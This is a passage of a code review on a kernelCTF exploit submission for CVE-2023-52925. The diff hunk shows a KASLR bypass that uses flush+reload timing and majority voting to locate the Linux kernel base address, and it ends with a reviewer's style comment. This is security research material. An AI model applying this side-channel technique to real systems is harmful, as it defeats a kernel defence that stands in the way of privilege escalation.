pocs/linux/kernelctf/CVE-2023-52925_mitigation/exploit/mitigation-v3-6.1.55/exploit.c

```diff
@@ -0,0 +1,936 @@
+                c++;
+              } else {
+                c--;
+              }
+            }
+
+            c = 0;
+            for (int i = 0; i < ARRAY_LEN(bases); i++) {
+              if (base == bases[i]) {
+                c++;
+              }
+            }
+            if (c > ARRAY_LEN(bases) / 2) {
+              base -= OFFSET;
+              goto got_base;
+            }
+
+            printf("majority vote failed:\n");
+            printf("base = %llx with %d votes\n", base, c);
+        }
+      #else
+        #define START (0xffffffff81000000ull)
+        #define END (0xffffffffc0000000ull)
+        #define STEP 0x0000000000200000ull
+        #define NUM_TRIALS 7
+        // largest contiguous mapped area at the beginning of _stext
+        #define WINDOW_SIZE 11
+
+        while (1) {
+            uint64_t bases[NUM_TRIALS] = {0};
+
+            for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
+                size_t times[(END - START) / STEP] = {};
+                uint64_t addrs[(END - START) / STEP];
+
+                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+                    times[ti] = ~0;
+                    addrs[ti] = START + STEP * (uint64_t)ti;
+                }
+
+                for (int i = 0; i < 16; i++) {
+                for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+                    uint64_t addr = addrs[ti];
+                    size_t t = flushandreload((void*)addr);
+                    if (t < times[ti]) {
+                        times[ti] = t;
+                    }
+                }
+                }
+
+                uint64_t max = 0;
+                int max_i = 0;
+                for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+                    uint64_t sum = 0;
+                    for (int i = 0; i < WINDOW_SIZE; i++) {
+                        sum += times[ti + i];
+                    }
+                    if (sum > max) {
+                        max = sum;
+                        max_i = ti;
+                    }
+                }
+
+                bases[vote] = addrs[max_i];
+            }
+
+            int c = 0;
+            for (int i = 0; i < ARRAY_LEN(bases); i++) {
+              if (c == 0) {
+                base = bases[i];
+              } else if (base == bases[i]) {
+                c++;
+              } else {
+                c--;
+              }
+            }
+
+            c = 0;
+            for (int i = 0; i < ARRAY_LEN(bases); i++) {
+              if (base == bases[i]) {
+                c++;
+              }
+            }
+            if (c > ARRAY_LEN(bases) / 2) {
+              goto got_base;
+            }
+
+            printf("majority vote failed:\n");
+            printf("base = %llx with %d votes\n", base, c);
+        }
+      #endif
+    }
+
+got_base:
+    printf("using kernel base %llx\n", base);
+
+    kbase = base;
+    // i64 diff = 0xffffffff81000000 - base;
```

Comment:
Please remove the commented out, unused code: https://google.github.io/security-research/kernelctf/style_guide#commented-out-code